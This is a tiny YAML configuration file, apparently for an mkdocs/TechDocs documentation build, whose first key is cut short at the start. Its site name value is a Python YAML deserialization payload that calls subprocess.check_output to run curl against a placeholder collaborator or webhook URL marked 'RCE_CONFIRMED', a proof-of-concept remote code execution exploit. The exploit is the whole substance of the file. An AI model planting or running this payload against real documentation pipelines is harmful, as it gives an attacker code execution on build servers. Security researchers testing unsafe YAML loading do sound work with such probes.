ite_name: !!python/object/apply:subprocess.check_output ["curl -k http://YOUR_COLLABORATOR_OR_WEBHOOK_URL/RCE_CONFIRMED"]
plugins:
  - techdocs-core






























